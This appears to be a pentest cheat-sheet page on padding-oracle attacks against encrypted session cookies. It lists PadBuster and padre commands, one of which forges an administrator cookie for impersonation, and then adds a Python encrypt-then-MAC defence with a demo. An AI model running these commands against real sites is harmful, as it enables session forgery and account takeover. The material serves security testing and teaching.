Pentest Book
Cookie Padding
# https://github.com/AonCyberLabs/PadBuster
# Get cookie structure
padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding"
# Get cookie for other user (impersonation)
padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorhc0nwithyhackme'

# https://github.com/glebarez/padre
padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='

# https://github.com/Kibouo/rustpad
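Added example (not from the original page or from any of the tools listed): the commands above only work when the server decrypts a modified cookie and answers with a distinguishable "Invalid padding" error, so the fix shown here is to verify an HMAC over the ciphertext before decrypting and to return one generic error for every failure. `MAC_KEY`, `GENERIC_ERROR`, `seal`, `open_cookie` and the `decrypt` callable are assumed names; the CBC routine itself is represented by a constructed stand-in.

```python
import base64, hashlib, hmac

GENERIC_ERROR = "Invalid session"       # single response for every failure mode
MAC_KEY = b"constructed-demo-mac-key"   # constructed; use a random server-side secret

def seal(ciphertext: bytes) -> str:
    """Encrypt-then-MAC: append HMAC-SHA256 over the CBC ciphertext (IV included)."""
    tag = hmac.new(MAC_KEY, ciphertext, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(ciphertext + tag).decode()

def open_cookie(cookie: str, decrypt):
    """Return (ok, value); `decrypt` stands in for the app's CBC routine (hypothetical)."""
    try:
        raw = base64.urlsafe_b64decode(cookie.encode())
    except ValueError:                   # binascii.Error is a ValueError subclass
        return False, GENERIC_ERROR
    if len(raw) <= 32:
        return False, GENERIC_ERROR
    ciphertext, tag = raw[:-32], raw[-32:]
    expected = hmac.new(MAC_KEY, ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return False, GENERIC_ERROR      # rejected before any unpadding runs
    try:
        return True, decrypt(ciphertext)
    except ValueError:
        return False, GENERIC_ERROR      # never surface "Invalid padding"

def demo():
    calls = []
    def fake_decrypt(ct):                # constructed stand-in, records each call
        calls.append(ct)
        return "user=demo"
    def bad_padding(ct):                 # constructed stand-in for an unpadding failure
        raise ValueError("Invalid padding")
    ct = base64.b64decode("xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka")  # cookie bytes from the page
    cookie = seal(ct)
    good = open_cookie(cookie, fake_decrypt)
    raw = bytearray(base64.urlsafe_b64decode(cookie))
    raw[15] ^= 0x01                      # simulate a single modified ciphertext bit
    tampered = base64.urlsafe_b64encode(bytes(raw)).decode()
    forged = open_cookie(tampered, fake_decrypt)
    padfail = open_cookie(cookie, bad_padding)
    return good, forged, padfail, len(calls)

if __name__ == "__main__":
    print(demo())
```

The modified cookie is rejected without the decrypt routine ever being called, and a padding failure behind a valid tag produces the same response as any other failure.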